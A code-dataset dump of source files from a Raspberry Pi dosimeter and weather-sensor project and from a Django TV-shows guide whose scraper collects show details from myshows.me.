"max_line_length": 68,
"num_lines": 117,
"path": "/weather_test_try.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "from appJar import gui\napp=gui()\nimport os\nimport csv\ndef weather_plot(btn):\n import matplotlib.pyplot as plt\n import dateutil\n import numpy as np\n from matplotlib.dates import DateFormatter\n\n times=[]\n degrees_list=[]\n pressure_list=[]\n humidity_list=[]\n\n file_name=[]\n for filename in os.listdir('.'):\n if filename.endswith(\".csv\"):\n file_name.append(os.path.join('.', filename))\n app.setFont(20)\n app.addOptionBox(\"Files\",file_name)\n \n def ok(btn):\n user_file=app.getOptionBox(\"Files\")\n \n results = csv.reader(open(user_file), delimiter=',')\n row_counter=0\n for r in results:\n if row_counter>0:\n times.append(dateutil.parser.parse(r[0]))\n degrees_list.append(float(r[1]))\n pressure_list.append(float(r[2]))\n humidity_list.append(float(r[3]))\n \n row_counter+=1\n \n temp_ave=[]\n temp_unc = []\n pressure_ave=[]\n pressure_unc=[]\n humidity_ave=[]\n humidity_unc=[]\n merge_times = []\n\n n_merge = 8\n ndata = len(degrees_list)\n nsum_data = int(ndata/n_merge)\n\n for i in range(nsum_data):\n itemp = degrees_list[i*n_merge:(i+1)*n_merge]\n itemp_array = np.asarray(itemp)\n temp_mean = np.mean(itemp_array)\n temp_sigma = np.sqrt(np.var(itemp_array))\n temp_ave.append(temp_mean)\n temp_unc.append(temp_sigma)\n \n for i in range(nsum_data):\n ipressure = pressure_list[i*n_merge:(i+1)*n_merge] \n ipressure_array = np.asarray(ipressure)\n pressure_mean = np.mean(ipressure_array)\n pressure_sigma = np.sqrt(np.var(ipressure_array))\n pressure_ave.append(pressure_mean)\n pressure_unc.append(pressure_sigma)\n \n for i in range(nsum_data):\n ihumid = humidity_list[i*n_merge:(i+1)*n_merge]\n ihumid_array = np.asarray(ihumid)\n humid_mean = np.mean(ihumid_array)\n humid_sigma = np.sqrt(np.var(ihumid_array))\n humidity_ave.append(humid_mean)\n humidity_unc.append(humid_sigma)\n\n for i in range(nsum_data):\n itimes = times[i*n_merge:(i+1)*n_merge]\n itime = itimes[int(len(itimes)/2)]\n merge_times.append(itime)\n\n\n \n \n fig=plt.figure()\n ax=fig.add_subplot(111) \n plt.plot(merge_times, temp_ave, \"b.\")\n plt.errorbar(merge_times, temp_ave, yerr = temp_unc)\n plt.title(\"Temperature\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Temperature(C)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n fig=plt.figure()\n ax=fig.add_subplot(111)\n plt.plot(merge_times, pressure_ave,\"g.\" )\n plt.errorbar(merge_times, pressure_ave, yerr = pressure_unc)\n plt.title(\"Pressure\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Pressure(hPa)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n\n\n fig=plt.figure()\n ax=fig.add_subplot(111)\n plt.plot(merge_times, humidity_ave,\"r.\" )\n plt.errorbar(merge_times, humidity_ave, yerr = humidity_unc)\n plt.title(\"Humidity\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Humidity(%)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n plt.show()\n app.addButton(\"OK\",ok)\n app.go()\n\napp.addButton(\"Plot Weather Data\",weather_plot)\napp.go()\n"
},
{
"alpha_fraction": 0.8405796885490417,
"alphanum_fraction": 0.8405796885490417,
"avg_line_length": 33.5,
"blob_id": "d8d1ae6c05d49432208e53cf217a9be2bc012493",
"content_id": "d7f788a53dd62af70396bc8af778e0dcb770f640",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 69,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# dosenet-raspberrypi\nRaspberry Pi specific software for dosimeters.\n"
},
{
"alpha_fraction": 0.5389993190765381,
"alphanum_fraction": 0.5444921851158142,
"avg_line_length": 31.9375,
"blob_id": "7e34046cadbc75d9dfcbcb08375724e2ed468789",
"content_id": "6caec2b405a285fde6d44d2e4c1389e246894a9a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10013,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 304,
"path": "/manager_air-quality.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "import time\nimport argparse\nimport signal\nimport sys\nimport serial\nimport csv\nimport datetime\n\nfrom globalvalues import RPI\nif RPI:\n import RPi.GPIO as GPIO\n\nfrom auxiliaries import Config, PublicKey\nfrom auxiliaries import datetime_from_epoch, set_verbosity\nfrom sender import ServerSender\nfrom data_handler_aq import Data_Handler_AQ\n\nfrom globalvalues import DEFAULT_CONFIG, DEFAULT_PUBLICKEY\nfrom globalvalues import DEFAULT_HOSTNAME, DEFAULT_UDP_PORT, DEFAULT_TCP_PORT\nfrom globalvalues import DEFAULT_SENDER_MODE\nfrom globalvalues import DEFAULT_DATALOG_AQ\nfrom globalvalues import DEFAULT_LOGFILE_AQ\nfrom globalvalues import DEFAULT_INTERVAL_NORMAL_AQ\nfrom globalvalues import DEFAULT_AQ_PORT, AQ_VARIABLES\nfrom globalvalues import DEFAULT_INTERVAL_TEST_AQ\n\ndef signal_term_handler(signal, frame):\n # If SIGTERM signal is intercepted, the SystemExit exception routines\n # get run\n sys.exit(0)\n\nsignal.signal(signal.SIGTERM, signal_term_handler)\n\n\nclass Manager_AQ(object):\n\n def __init__(self,\n interval=None,\n sender_mode=DEFAULT_SENDER_MODE,\n verbosity=None,\n log=False,\n logfile=None,\n datalog=None,\n datalogflag=False,\n config=None,\n publickey=None,\n hostname=DEFAULT_HOSTNAME,\n port=None,\n test=None,\n AQ_port=DEFAULT_AQ_PORT,\n variables=AQ_VARIABLES,\n ):\n\n self.interval = interval\n\n self.aq_port = AQ_port\n self.variables = variables\n\n self.datalog = datalog\n self.datalogflag = datalogflag\n\n self.a_flag()\n self.d_flag()\n self.make_data_log(self.datalog)\n\n self.test = test\n\n self.handle_input(\n log, logfile, verbosity, test, interval, config, publickey)\n\n self.data_handler = Data_Handler_AQ(\n manager=self,\n verbosity=self.v,\n logfile=self.logfile,\n variables=self.variables)\n self.sender = ServerSender(\n manager=self,\n mode=sender_mode,\n port=port,\n verbosity=self.v,\n logfile=self.logfile)\n\n self.data_handler.backlog_to_queue()\n\n def a_flag(self):\n \"\"\"\n Checks if the -a from_argparse is called.\n If it is called, sets the path of the data-log to\n DEFAULT_DATALOG_D3S.\n \"\"\"\n if self.datalogflag:\n self.datalog = DEFAULT_DATALOG_AQ\n\n def d_flag(self):\n \"\"\"\n Checks if the -d from_argparse is called.\n If it is called, sets datalogflag to True.\n \"\"\"\n if self.datalog:\n self.datalogflag = True\n\n def make_data_log(self, file):\n if self.datalogflag:\n with open(file, 'a') as f:\n pass\n\n def handle_input(self, log, logfile, verbosity, test, interval,\n config, publickey):\n\n if log and logfile is None:\n logfile = DEFAULT_LOGFILE_AQ\n\n if logfile and not log:\n log = True\n\n if log:\n self.logfile = logfile\n else:\n self.logfile = None\n\n if verbosity is None:\n if test:\n verbosity = 2\n else:\n verbosity = 1\n self.v = verbosity\n set_verbosity(self, logfile=logfile)\n\n if log:\n self.vprint(1, '')\n self.vprint(1, 'Writing to logfile at {}'.format(self.logfile))\n self.running = False\n\n if self.test:\n if interval is None:\n self.vprint(\n 2, \"No interval given, using default for TEST MODE\")\n interval = DEFAULT_INTERVAL_TEST_AQ\n\n if interval is None:\n self.vprint(\n 2, \"No interval given, using interval at 5 minutes\")\n interval = DEFAULT_INTERVAL_NORMAL_AQ\n if config is None:\n self.vprint(2, \"No config file given, \" +\n \"attempting to use default config path\")\n config = DEFAULT_CONFIG\n if publickey is None:\n self.vprint(2, \"No publickey file given, \" +\n \"attempting to use default publickey path\")\n publickey = DEFAULT_PUBLICKEY\n\n self.interval = interval\n\n if config:\n try:\n self.config = Config(config,\n verbosity=self.v, logfile=self.logfile)\n except IOError:\n raise IOError(\n 'Unable to open config file {}!'.format(config))\n else:\n self.vprint(\n 1, 'WARNING: no config file given. Not posting to server')\n self.config = None\n\n if publickey:\n try:\n self.publickey = PublicKey(\n publickey, verbosity=self.v, logfile=self.logfile)\n except IOError:\n raise IOError(\n 'Unable to load publickey file {}!'.format(publickey))\n else:\n self.vprint(\n 1, 'WARNING: no public key given. Not posting to server')\n self.publickey = None\n\n self.aes = None #checked in sender, used for the manager_d3s\n\n def run(self):\n\n this_start, this_end = self.get_interval(time.time())\n self.vprint(\n 1, ('Manager is starting to run at {}' +\n ' with intervals of {}s').format(\n datetime_from_epoch(this_start), self.interval))\n self.running = True\n try:\n while self.running:\n\n self.handle_air_counts(this_start, this_end)\n\n this_start, this_end = self.get_interval(this_end)\n\n except KeyboardInterrupt:\n self.vprint(1, '\\nKeyboardInterrupt: stopping Manager run')\n self.stop()\n self.takedown()\n except SystemExit:\n self.vprint(1, '\\nSystemExit: taking down Manager')\n self.stop()\n self.takedown()\n\n def stop(self):\n \"\"\"Stop counting time\"\"\"\n self.running = False\n\n def get_interval(self, start_time):\n \"\"\"\n Return start and end time for interval, based on given start_time.\n \"\"\"\n end_time = start_time + self.interval\n return start_time, end_time\n\n def data_log(self, file, **kwargs):\n \"\"\"\n Writes average_data list to file\n \"\"\"\n time_string = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n average_data = kwargs.get('average_data')\n if self.datalogflag:\n with open(file, 'a') as f:\n f.write('{0}, {1}'.format(time_string, average_data))\n f.write('\\n')\n self.vprint(2, 'Writing average air quality data to data log at {}'.format(file))\n\n def handle_air_counts(self, this_start, this_end):\n \"\"\"\n Takes air quality data for a given interval and sends\n a list of data to the data handler\n \"\"\"\n aq_data_set = []\n average_data = []\n while time.time() < this_end:\n text = self.aq_port.read(32)\n buffer = [ord(c) for c in text]\n if buffer[0] == 66:\n summation = sum(buffer[0:30])\n checkbyte = (buffer[30]<<8)+buffer[31]\n if summation == checkbyte:\n current_second_data = []\n buf = buffer[1:32]\n current_second_data.append(datetime.datetime.now())\n for n in range(1,4):\n current_second_data.append(repr(((buf[(2*n)+1]<<8) + buf[(2*n)+2])))\n for n in range(1,7):\n current_second_data.append(repr(((buf[(2*n)+13]<<8) + buf[(2*n)+14])))\n aq_data_set.append(current_second_data)\n for c in range(len(self.variables)):\n c_data = []\n for i in range(len(aq_data_set)):\n c_data.append(aq_data_set[i][c+1])\n c_data_int = list(map(int, c_data))\n avg_c = sum(c_data_int)/len(c_data_int)\n average_data.append(avg_c)\n\n self.data_handler.main(\n self.datalog, average_data, this_start, this_end)\n def takedown(self):\n \"\"\"\n Sends data to the backlog and shuts\n down the manager\n \"\"\"\n self.data_handler.send_all_to_backlog()\n\n del(self)\n\n @classmethod\n def from_argparse(cls):\n parser = argparse.ArgumentParser()\n parser.add_argument('--interval', '-i', type=int, default=None)\n parser.add_argument(\n '--sender-mode', '-m', type=str, default=DEFAULT_SENDER_MODE,\n choices=['udp', 'tcp', 'UDP', 'TCP'])\n parser.add_argument('--verbosity', '-v', type=int, default=None)\n parser.add_argument('--log', '-l', action='store_true', default=False)\n parser.add_argument('--logfile', '-f', type=str, default=None)\n parser.add_argument('--datalog', '-d', default=None)\n parser.add_argument(\n '--datalogflag', '-a', action='store_true', default=False)\n parser.add_argument('--config', '-c', default=None)\n parser.add_argument('--publickey', '-k', default=None)\n parser.add_argument('--hostname', '-s', default=DEFAULT_HOSTNAME)\n parser.add_argument('--port', '-p', type=int, default=None)\n parser.add_argument('--test', '-t', action='store_true', default=False)\n\n args = parser.parse_args()\n arg_dict = vars(args)\n mgr = Manager_AQ(**arg_dict)\n\n return mgr\n\nif __name__ == '__main__':\n mgr = Manager_AQ.from_argparse()\n try:\n mgr.run()\n except:\n if mgr.logfile:\n # print exception info to logfile\n with open(mgr.logfile, 'a') as f:\n traceback.print_exc(15, f)\n # regardless, re-raise the error which will print to stderr\n raise\n"
},
{
"alpha_fraction": 0.5242795944213867,
"alphanum_fraction": 0.5351480841636658,
"avg_line_length": 35.20577621459961,
"blob_id": "59e043b27e43e29b85475ba5a9f94abd19e93003",
"content_id": "d5d7666a4a515aafd1a587b4e7a41f117c01ff6c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10029,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 277,
"path": "/weather_DAQ.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 12 11:32:41 2017\n\n@author: Ludi Cao\n\"\"\"\nimport time\nimport datetime\nimport csv\nfrom Adafruit_BME280 import *\nimport os\nimport numpy as np\nimport dateutil\nfrom matplotlib.dates import DateFormatter\nimport matplotlib.pyplot as plt\nfrom collections import deque\n\nclass weather_DAQ(object):\n def __init__(self, maxdata, n_merge):\n self.sensor = None\n self.running=False\n self.time_queue=deque()\n self.temp_queue=deque()\n self.humid_queue=deque()\n self.press_queue=deque()\n self.temp_err=deque()\n self.humid_err=deque()\n self.press_err=deque()\n self.maxdata=int(maxdata)\n self.n_merge=int(n_merge)\n self.temp_list=[]\n self.humid_list=[]\n self.press_list=[]\n self.time_list=[]\n self.merge_test=False\n self.first_data = True\n self.last_time = None\n\n def close(self,plot_id):\n plt.close(plot_id)\n \n def create_file(self):\n global results\n self.sensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8) \n file_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\n filename = \"/home/pi/data/weather_test_results_\"+file_time+\".csv\"\n results=csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n metadata=[\"Time\", \"Temp (C)\",\"Temp SD\",\"Pressure (hPa)\", \"Pressure SD\",\"Humidity (%)\",\"Humidity SD\"]\n results.writerow(metadata)\n\n def start(self):\n global results\n date_time = datetime.datetime.now()\n degrees = self.sensor.read_temperature()\n pascals = self.sensor.read_pressure()\n hectopascals = pascals / 100\n humidity = self.sensor.read_humidity()\n \n data=[]\n\n self.merge_test=False\n self.add_data(self.temp_queue,self.temp_err,self.temp_list,degrees)\n self.add_data(self.humid_queue,self.humid_err,self.humid_list,humidity)\n self.add_data(self.press_queue,self.press_err,self.press_list,hectopascals)\n self.add_time(self.time_queue,self.time_list, date_time)\n \n # data.append(date_time)\n # data.append(degrees)\n # data.append(hectopascals)\n # data.append(humidity)\n \n # results.writerow(data) \n\n if self.first_data and len(self.temp_queue) != 0:\n for i in range(len(self.temp_queue)):\n data = []\n data.append(self.time_queue[i])\n data.append(self.temp_queue[i])\n data.append(self.temp_err[i])\n data.append(self.press_queue[i])\n data.append(self.press_err[i])\n data.append(self.humid_queue[i])\n data.append(self.humid_err[i])\n results.writerow(data)\n\n self.last_time = data[0]\n self.first_data = False\n elif not self.first_data:\n try:\n print(self.last_time)\n if self.time_queue[-1] != self.last_time:\n data = []\n data.append(self.time_queue[-1])\n data.append(self.temp_queue[-1])\n data.append(self.temp_err[-1])\n data.append(self.press_queue[-1])\n data.append(self.press_err[-1])\n data.append(self.humid_queue[-1])\n data.append(self.humid_err[-1])\n results.writerow(data)\n\n self.last_time = self.time_queue[-1]\n else:\n print('duplicated data.')\n except IndexError:\n print('No new data being written.')\n else: \n print('No data acquired yet.')\n\n print ('Temp = {0:0.3f} deg C'.format(degrees))\n print ('Pressure = {0:0.2f} hPa'.format(hectopascals))\n print ('Humidity = {0:0.2f} %\\n'.format(humidity))\n \n \n def press(self):\n if len(self.time_queue)>0:\n self.update_plot(3,self.time_queue,self.press_queue,self.press_err,\"Time\",\"Pressure(hPa)\",\"Pressure vs. time\")\n \n def temp(self):\n if len(self.time_queue)>0:\n self.update_plot(1,self.time_queue,self.temp_queue,self.temp_err,\"Time\",\"Temperature(C)\",\"Temperature vs. time\")\n \n def humid(self):\n if len(self.time_queue)>0:\n self.update_plot(2,self.time_queue,self.humid_queue,self.humid_err,\"Time\",\"Humidity(%)\",\"Humidity vs.time\")\n\n\n def add_time(self, queue, timelist, data):\n print('Input time: {}\\n'.format(data))\n timelist.append(data)\n\n if len(timelist)>=self.n_merge:\n self.merge_test=True\n queue.append(timelist[int((self.n_merge)/2)])\n print('Queue time: {}\\n'.format(timelist[int((self.n_merge)/2)]))\n for i in range(len(timelist)):\n timelist.pop()\n if len(queue)>self.maxdata:\n queue.popleft()\n \n\n def add_data(self, queue, queue_err,temp_list, data):\n temp_list.append(data)\n if len(temp_list)>=self.n_merge:\n queue.append(np.mean(np.asarray(temp_list)))\n queue_err.append(np.std(np.asarray(temp_list)))\n for i in range(len(temp_list)):\n temp_list.pop()\n if len(queue)>self.maxdata:\n queue.popleft()\n \n def update_plot(self,plot_id,xdata,ydata,yerr,xlabel,ylable,title):\n plt.ion()\n fig = plt.figure(plot_id)\n plt.clf()\n ax=fig.add_subplot(111)\n plt.xlabel(xlabel)\n plt.ylabel(ylable) \n plt.title(title)\n plt.plot(xdata,ydata,\"r.\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n ax.errorbar(xdata, ydata, yerr=yerr)\n fig.show()\n plt.pause(0.0005)\n\n def plotdata(self):\n \n times=[]\n degrees_list=[]\n pressure_list=[]\n humidity_list=[]\n temp_ave=[]\n temp_unc = []\n pressure_ave=[]\n pressure_unc=[]\n humidity_ave=[]\n humidity_unc=[]\n merge_times = []\n \n app=gui(\"Weather Plot\",\"800x400\") \n app.addLabel(\"1\",\"Please choose a following .csv file\")\n file_name=[]\n for filename in os.listdir('.'):\n if filename.endswith(\".csv\"):\n file_name.append(os.path.join('.', filename))\n app.setFont(20)\n app.addOptionBox(\"Files\",file_name)\n app.setOptionBoxHeight(\"Files\",\"4\")\n app.addLabel(\"2\",\"Enter the number of data points to merge:\")\n app.setLabelFont(\"20\",\"Heletica\")\n app.addNumericEntry(\"n\")\n app.setFocus(\"n\") \n \n def ok(btn):\n user_file=app.getOptionBox(\"Files\") \n n_merge=int(app.getEntry(\"n\"))\n row_counter=0\n results = csv.reader(open(user_file), delimiter=',')\n\n\n for r in results:\n if row_counter>0:\n times.append(dateutil.parser.parse(r[0]))\n degrees_list.append(float(r[1]))\n pressure_list.append(float(r[2]))\n humidity_list.append(float(r[3]))\n \n row_counter+=1\n\n ndata = int(len(degrees_list))\n nsum_data = int(ndata/n_merge)\n\n for i in range(nsum_data):\n itemp = degrees_list[i*n_merge:(i+1)*n_merge]\n itemp_array = np.asarray(itemp)\n temp_mean = np.mean(itemp_array)\n temp_sigma = np.sqrt(np.var(itemp_array))\n temp_ave.append(temp_mean)\n temp_unc.append(temp_sigma)\n \n for i in range(nsum_data):\n ipressure = pressure_list[i*n_merge:(i+1)*n_merge] \n ipressure_array = np.asarray(ipressure)\n pressure_mean = np.mean(ipressure_array)\n pressure_sigma = np.sqrt(np.var(ipressure_array))\n pressure_ave.append(pressure_mean)\n pressure_unc.append(pressure_sigma)\n \n for i in range(nsum_data):\n ihumid = humidity_list[i*n_merge:(i+1)*n_merge]\n ihumid_array = np.asarray(ihumid)\n humid_mean = np.mean(ihumid_array)\n humid_sigma = np.sqrt(np.var(ihumid_array))\n humidity_ave.append(humid_mean)\n humidity_unc.append(humid_sigma)\n\n for i in range(nsum_data):\n itimes = times[i*n_merge:(i+1)*n_merge]\n itime = itimes[int(len(itimes)/2)]\n merge_times.append(itime)\n fig=plt.figure()\n ax=fig.add_subplot(111) \n plt.plot(merge_times, temp_ave, \"b.\")\n plt.errorbar(merge_times, temp_ave, yerr = temp_unc)\n plt.title(\"Temperature\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Temperature(C)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n fig=plt.figure()\n ax=fig.add_subplot(111)\n plt.plot(merge_times, pressure_ave,\"g.\" )\n plt.errorbar(merge_times, pressure_ave, yerr = pressure_unc)\n plt.title(\"Pressure\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Pressure(hPa)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n fig=plt.figure()\n ax=fig.add_subplot(111)\n plt.plot(merge_times, humidity_ave,\"r.\" )\n plt.errorbar(merge_times, humidity_ave, yerr = humidity_unc)\n plt.title(\"Humidity\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Humidity(%)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n plt.show()\n \n app.addButton(\"OK\",ok)\n app.setButtonWidth(\"OK\",\"20\")\n app.setButtonHeight(\"OK\",\"4\")\n app.setButtonFont(\"20\",\"Helvetica\")\n app.go()\n"
}
] | 10 |
moffire/shows_guide
|
https://github.com/moffire/shows_guide
|
11145b3c2ffc9d1ca13c28bb4bb80ff7dda82676
|
200c768bd4fe975ea25797f7285415c328dfdb6e
|
f31eaf5366a6740fb40820d0069dd16e7e5bda93
|
refs/heads/master
| 2023-03-05T14:35:46.457768 | 2021-02-20T18:16:07 | 2021-02-20T18:16:07 | 296,393,328 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6752577424049377,
"alphanum_fraction": 0.6752577424049377,
"avg_line_length": 34.272727966308594,
"blob_id": "5c88bd3eba6e69bd8f367124cd810343e2089c8e",
"content_id": "4d01b042ba9b6a4d94607142b7d95ee0d15b5aa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 11,
"path": "/shows/urls.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import MainPageView, MovieDetail, SearchView, RatingView\n\napp_name = 'shows'\n\nurlpatterns = [\n path('', MainPageView.as_view(), name='index'),\n path('<str:rating>/', RatingView.as_view(), name='rating'),\n path('details/<int:external_id>/', MovieDetail.as_view(), name='detail'),\n path('search', SearchView.as_view(), name='search'),\n]\n"
},
{
"alpha_fraction": 0.7204610705375671,
"alphanum_fraction": 0.7325648665428162,
"avg_line_length": 36.71739196777344,
"blob_id": "84ebd9ce72558d36fc6a753d5924205d367f1ed6",
"content_id": "eed14c3fc4b0883f6007d6eef35085ccc726b573",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 46,
"path": "/shows/models.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.urls import reverse\n\nclass Movie(models.Model):\n\texternal_id = models.IntegerField(unique=True)\n\tfirst_title = models.CharField(max_length=200, blank=True, db_index=True)\n\tsecond_title = models.CharField(max_length=200, blank=True, db_index=True)\n\tdescription = models.TextField(max_length=1000, blank=True)\n\tstart_date = models.DateField(null=True, blank=True, editable=False)\n\tend_date = models.DateField(null=True, blank=True)\n\tcountry = models.CharField(max_length=100)\n\timdb = models.DecimalField(max_digits=5, decimal_places=3)\n\tkp = models.DecimalField(max_digits=5, decimal_places=3)\n\tposter = models.ImageField(upload_to='images/', blank=True)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('shows:detail', args=[int(self.external_id)])\n\n\tdef get_average(self):\n\t\t\"\"\"\n\t\taverage rating score\n\t\t\"\"\"\n\t\treturn (self.imdb + self.kp) / 2\n\n\tdef __str__(self):\n\t\treturn \"{} :: {}\".format(self.first_title, self.second_title)\n\n\nclass Season(models.Model):\n\tmovie = models.ForeignKey(Movie, on_delete=models.CASCADE, related_name='seasons')\n\tnumber = models.IntegerField()\n\n\tdef __str__(self):\n\t\treturn \"Season №{} / {}\".format(self.number, self.movie.first_title)\n\n\nclass Episode(models.Model):\n\tmovie = models.ForeignKey(Movie, on_delete=models.CASCADE, related_name='episodes')\n\tseason = models.ForeignKey(Season, on_delete=models.CASCADE, related_name='episodes')\n\tnumber = models.IntegerField()\n\tname = models.CharField(max_length=200, blank=True)\n\tdate = models.DateField(editable=False, null=True, blank=True)\n\n\tdef __str__(self):\n\t\treturn \"Episode №{} / Season №{} / {}\".format(self.number, self.season.number, self.movie.first_title)\n"
},
{
"alpha_fraction": 0.6993464231491089,
"alphanum_fraction": 0.6993464231491089,
"avg_line_length": 18.25,
"blob_id": "950a898c49545acee08453a9e65faf275c76519c",
"content_id": "26e06c570359d61076778207d5cff1ee7e0e80b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/accounts/urls.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import ProfileView\n\napp_name = 'profile'\n\nurlpatterns = [\n path('', ProfileView.as_view(), name='profile'),\n]"
},
{
"alpha_fraction": 0.7654417753219604,
"alphanum_fraction": 0.7654417753219604,
"avg_line_length": 35.57143020629883,
"blob_id": "a1bcf6edd77a799bcf2011a6212ab077fa2fff03",
"content_id": "8ec1f1f92d9ffea91d2c271510f19355d1bb11eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1279,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 35,
"path": "/accounts/models.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth import get_user_model\n\nfrom shows.models import Movie, Episode\n\nUser = get_user_model()\n\nclass UserProfile(User):\n\tuser = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile')\n\tavatar = models.ImageField(upload_to='users_logo/', blank=True)\n\nclass Sub(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name='subs')\n\tmovie = models.OneToOneField(Movie, on_delete=models.CASCADE, related_name='subs')\n\n\tdef __str__(self):\n\t\treturn \"{} :: {}\".format(self.movie.first_title, self.movie.second_title)\n\nclass SubEpisode(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name='viewed_episodes')\n\tsub = models.ForeignKey(Sub, on_delete=models.CASCADE, related_name='viewed_episodes')\n\tepisode = models.OneToOneField(Episode, on_delete=models.CASCADE)\n\tis_viewed = models.BooleanField(default=False)\n\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n\tif created:\n\t\tUserProfile.objects.create(user=instance)\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n\tinstance.profile.save()"
},
{
"alpha_fraction": 0.5758365988731384,
"alphanum_fraction": 0.5799652338027954,
"avg_line_length": 32.84558868408203,
"blob_id": "030b17c9b767649241230931afd5874c8795f27b",
"content_id": "82aaa46eaaae65f7d75b166d15428813b914746c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4636,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 136,
"path": "/collector/collect.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from tempfile import NamedTemporaryFile\nfrom urllib.request import urlopen\n\nimport requests\nimport re\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\nfrom dateutil.parser import parse\nfrom django.core.files import File\n\nfrom shows.models import Movie, Season, Episode\n\nURL = 'https://myshows.me/'\n\n\ndef collect_data(external_id):\n url = URL + f'view/{external_id}/'\n page = requests.get(url)\n html = BeautifulSoup(page.text, \"html.parser\")\n return html\n\n\n\ndef collect_movie(external_id):\n try:\n m = Movie.objects.get(external_id=external_id)\n\n except Movie.DoesNotExist:\n\n m = Movie()\n html = collect_data(external_id)\n\n m.external_id = external_id\n try:\n m.first_title = html.find(\"h1\", itemprop='name').text.rstrip()\n except AttributeError:\n m.first_title = None\n\n try:\n m.second_title = html.find(\"p\", class_='subHeader').text.rstrip()\n except AttributeError:\n m.second_title = None\n\n info = html.find(class_='clear')\n\n dates = info.find(class_='flat').text.split(': ')[1].split(' – ')\n\n try:\n m.start_date = parse(dates[0])\n except ValueError:\n m.start_date = None\n\n\n try:\n m.end_date = parse(dates[1]) if dates[1] != '…' or '---' else None\n except ValueError:\n m.end_date = None\n\n clear_data = html.find(class_='clear')\n m.country = clear_data.find(string='Страна:').parent.parent.find('a').text or None\n try:\n m.imdb = clear_data.find(string='Рейтинг IMDB:').parent.parent.find(target='_blank').text\n except AttributeError:\n m.imdb = Decimal(0.0)\n try:\n m.kp = clear_data.find(string='Рейтинг Кинопоиска:').parent.parent.find(target='_blank').text\n except AttributeError:\n m.kp = Decimal(0.0)\n try:\n m.description = html.find(class_='col5').find_all('p')[0].text\n except (AttributeError, IndexError):\n m.description = ''\n\n raw_poster_html = html.find(class_='presentBlockImg')\n poster = re.search('(?<=\\().+?(?=\\))|$', str(raw_poster_html)).group()\n if poster:\n img_temp = NamedTemporaryFile(delete=True)\n img_temp.write(urlopen(poster).read())\n img_temp.flush()\n m.poster.save(f\"{external_id}.jpg\", File(img_temp), save=False)\n else:\n m.poster = None\n m.save()\n collect_seasons(m)\n\n collect_seasons(m)\n\n\ndef collect_seasons(movie_object):\n s = Season.objects.filter(movie_id=movie_object.id)\n s_values = s.values_list('number', flat=True)\n html = collect_data(movie_object.external_id)\n\n raw_seasons_data = 